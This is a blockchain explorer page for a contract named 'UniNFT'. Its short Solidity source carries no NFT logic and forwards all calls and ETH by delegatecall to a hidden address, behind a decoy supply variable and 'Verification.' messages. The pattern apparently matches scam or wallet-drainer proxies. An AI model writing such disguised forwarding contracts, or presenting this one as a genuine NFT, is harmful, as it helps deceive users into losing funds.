Address Contract Partially Verified
Address
0xCB45f008676C2638056849bE2813Ab08063f67CE
Balance
0 ETH
Nonce
1
Code Size
276 bytes
Creator
0x6E55e861...6233 at tx 0x3cb23fbe...22fe3b
Indexed Transactions
0
Contract Bytecode
276 bytes
0x608060405236600a57005b600036606060008073475524de13f635cbbca065c3b70c35cdeb6125ea6001600160a01b03168585604051603e92919060ce565b600060405180830381855af49150503d80600081146077576040519150601f19603f3d011682016040523d82523d6000602084013e607c565b606091505b50915091508160c15760405162461bcd60e51b815260206004820152600d60248201526c2b32b934b334b1b0ba34b7b71760991b604482015260640160405180910390fd5b8051945060200192505050f35b818382376000910190815291905056fea2646970667358221220295bdd182dbc2edf093bb4713acadd8f8277f5447d54699dad32b362ec0affcd64736f6c634300080d0033
Verified Source Code Partial Match
Compiler: v0.8.13+commit.abaa5c0e
EVM: london
Optimization: Yes (200 runs)
UniNFT.sol 21 lines
// SPDX-License-Identifier: MIT
pragma solidity <=0.8.13;
contract UniNFT {
uint256 private totalSupply = 5051;
fallback(bytes calldata data) payable external returns(bytes memory){
(bool r1, bytes memory result) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data);
require(r1, "Verification.");
return result;
}
receive() payable external {
}
constructor() {
bytes memory data = abi.encodeWithSignature("initialize()");
(bool r1,) = address(0x475524DE13F635CbBcA065C3B70C35cDEb6125ea).delegatecall(data);
require(r1, "Verificiation.");
}
}
Recent Transactions
No transactions found for this address